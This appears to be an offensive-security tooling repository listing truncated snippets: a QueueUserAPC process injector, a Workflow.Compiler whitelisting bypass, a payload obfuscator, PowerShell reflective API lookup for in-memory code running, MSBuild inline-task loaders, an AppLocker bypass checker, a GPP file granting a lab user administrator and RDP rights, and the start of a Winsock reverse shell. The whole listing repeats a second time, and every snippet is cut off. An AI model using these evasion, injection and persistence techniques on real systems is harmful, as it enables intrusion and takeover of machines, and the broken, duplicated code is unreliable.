brax braaaax

## DInjectQueuerAPC.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

## workflow_compiler_helper.ps1
$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper',[Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "C:\Users\Public\test.txt"
$output = "run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null,@([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam,[String[]] @(,$pathvar)))

## substitute.ps1
$payload =  "hi mom"
[string]$output = ""
$payload.ToCharArray() | %{
 [string]$thischar = [byte][char]$_ + 17
 if($thischar.Length -eq 1)
 {
 $thischar = [string]"00" + $thischar
 $output += $thischar
 }
 elseif($thischar.Length -eq 2)

## run.ps1
function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | ? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | % {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    Param (

## brax.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="0xtaco">
    <Brax />
  </Target>
  <UsingTask
    TaskName="Brax"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">

## aes_encrypt.go
package main

import (
        "bufio"
        "bytes"

## Applocker-bypass-checker.ps1
# AppLocker Bypass Checker (Default Rules) v2.0
#
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed.
# A normal user shouln't have write permission in that folder, but that is not always the case.
# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations
#
# @Author: Sparc Flow in "How to Hack a Fashion Brand"
#
# NOTE: change the group and root_folder variables to suit your needs

## csrev.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <Target Name="Hello">
 <ClassExample />
 </Target>
 <UsingTask
 TaskName="ClassExample"
 TaskFactory="CodeTaskFactory"
 AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 <Task>


## gpo abuse
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
	<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130

## reverse.c
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "w2_32")

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace DinjectorWithQUserAPC
	{


	public class Program
	$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
	$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
	$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper',[Reflection.BindingFlags] 'NonPublic, Static')
	Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
	$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
	$compilerparam.GenerateInMemory = $True
	$pathvar = "C:\Users\Public\test.txt"
	$output = "run.xml"
	$tmp = $SerializeInputToWrapper.Invoke($null,@([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam,[String[]] @(,$pathvar)))
	$payload = "hi mom"
	[string]$output = ""
	$payload.ToCharArray() \| %{
	[string]$thischar = [byte][char]$_ + 17
	if($thischar.Length -eq 1)
	{
	$thischar = [string]"00" + $thischar
	$output += $thischar
	}
	elseif($thischar.Length -eq 2)
	function LookupFunc {
	Param ($moduleName, $functionName)
	$assem = ([AppDomain]::CurrentDomain.GetAssemblies() \| ? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$tmp=@()
	$assem.GetMethods() \| % {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
	return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
	}

	function getDelegateType {
	Param (
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="0xtaco">
	<Brax />
	</Target>
	<UsingTask
	TaskName="Brax"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs">
	# AppLocker Bypass Checker (Default Rules) v2.0
	#
	# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed.
	# A normal user shouln't have write permission in that folder, but that is not always the case.
	# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations
	#
	# @Author: Sparc Flow in "How to Hack a Fashion Brand"
	#
	# NOTE: change the group and root_folder variables to suit your needs
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<?xml version="1.0" encoding="utf-8"?>
	<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
	<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130
	/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */

	#include <winsock2.h>
	#include <stdio.h>

	#pragma comment(lib, "w2_32")

	WSADATA wsaData;
	SOCKET Winsock;
	SOCKET Sock;